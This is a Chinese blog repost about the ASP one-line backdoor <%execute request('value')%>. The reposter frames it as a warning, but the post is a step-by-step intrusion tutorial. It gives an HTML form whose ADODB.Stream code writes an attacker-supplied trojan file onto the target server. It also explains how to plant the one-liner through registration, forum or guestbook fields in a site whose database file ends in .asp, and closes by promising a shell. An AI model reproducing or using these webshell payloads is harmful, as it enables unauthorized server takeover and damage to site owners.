execute request(“value”)

  • 724 views
  • 阅读模式

转这篇文章只是希望大家能够防御好,因为我的站点就是被这个东西害的
对方首先上传图片木马,然后上传木马后门,直接在他的本地操作我的文件。

<%execute request("value")%>与asp网站的安全性2008-10-18 12:07在ASP里有一句语句<%execute ............")%>意思是执行省略号里的语句.那么如果我写进我们精心构造的语句,它也是会帮我们执行的.

(现在先假设在远程主机的TEXT.ASP中已经有了<%execute request("value")%>这个语句.)就按照这上面的思路,我们就可以在本地构造一个表单内容如下:(//为注释)

<form action=http://主机路径/TEXT.asp method=post>

<textarea name=value cols=120 rows=10 width=45>

set lP=server.createObject("Adodb.Stream")//建立流对象
lP.Open //打开
lP.Type=2 //以文本方式
lP.CharSet="gb2312" //字体标准
lP.writetext request("newvalue")

lP.SaveToFile server.mappath("newmm.asp"),2 //将木马内容以覆盖文件的方式写入newmm.asp,2就是已覆 盖的方式
lP.Close //关闭对象
set lP=nothing //释放对象
response.redirect "newmm.asp" //转向newmm.asp

</textarea>

<textarea name=newvalue cols=120 rows=10 width=45>添入生成木马的内容</textarea><BR><center><br>
<input type=submit value=提交>

</form>

 

开先我们不是假设远程主机的TEXT.ASP这个文件里有这么<%execute request("value")%>一句吗?表单的作用就是把我们表单里的内容提交到远程主机的TEXT.ASP这个文件.然后因为TEXT.ASP里有<%execute request("value")%>这句,那么这句代码就会执行我们从表单里传来的内容哦.(表单名必须和<%execute request("value")%>里的VALUE一样,就是我用蓝色标记的那两处,必须相等)

说到这里大家是不是清楚了.我们构造了两个表单,第一个表单里的代码是文件操作的代码(就是把第二个表单内的内容写入在当前目录下并命名为newvalue.ASP的这么一段操作的处理代码)那么第二个表单当然就是我们要写入的马了.

具体的就是下面这一段:

set lP=server.createObject("Adodb.Stream")//建立流对象
lP.Open //打开
lP.Type=2 //以文本方式
lP.CharSet="gb2312" //字体标准
lP.writetext request("newvalue")

lP.SaveToFile server.mappath("newvalue.asp"),2 //将木马内容以覆盖文件的方式写入newmm.asp,2就是已覆 盖的方式
lP.Close //关闭对象
set lP=nothing //释放对象
response.redirect "newmm.asp" //转向newmm.asp

这样的话第二个表单的名字必须和lP.writetext request("newvalue") 里的Newvalue一样,就是我用红色标注的那两处.

啊,基本说完了,对于不懂ASP的朋友,理解起来是有点难度.

好,刚才是假设主机存在<%execute request("value")%>那么对于平常的网站又没有这句我们怎么下手呢
有个条件,假如你得到了它的数据库名,(当然我这里说的是它的后缀是以ASP结尾的,你下载不了它的数据库,要不然的话我这篇文章不是白写了吗)那么你就在网站留言也好,论坛也好,注册也好,只要有表单的地方写入这名<%execute request("value")%>,比如说注册的名字你用这个.不行的话写在简介里啊等.......

只要注册成功,那么它的数据库里就含有了<%execute request("value")%>这个语句.那么表单的路径就换为

<form action=http://主机路径/数据库名.ASP method=post>

好了,把你的大马写在第二个表单里提交吧.

等着拿SHELL吧!

weinxin
我的微信
这是我的微信扫一扫
年轻的老刘
  • 本文由 发表于 2015年4月8日 16:23:50
  • 转载请务必保留本文链接:https://www.uhua0318.com/execute-requestvalue.html
易企CMS

易企CMS仿站标签大全

头部标签: 每个页面都必须加的三大标签(将标签放入header.tpl里面,这样只需在每个模板中调用header.tpl即可): <title>{$seotitle}_{$sitename...
帝国CMS

帝国CMS手机端,栏目绑定二级域名详解

帝国栏目绑定二级域名步骤: 1、把需要二级域名解析到服务器IP。 2、在服务器上绑定二级域名至网站目录。 3、进入帝国后台,栏目设置里,绑定域名处填写域名,域名需要http://XXX.XXX.XX(...
帝国CMS

帝国CMS安全防护教程详解

帝国CMS是什么程序 帝国CMS是一套开源的静态页面程序,凭借超高的扩展性,很多知名的新闻站点、行业站点都是应用的帝国CMS后端。因为帝国CMS和dedecms一样都是生成静态页面的,所以非常利于SE...

发表评论

匿名网友

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen:

确定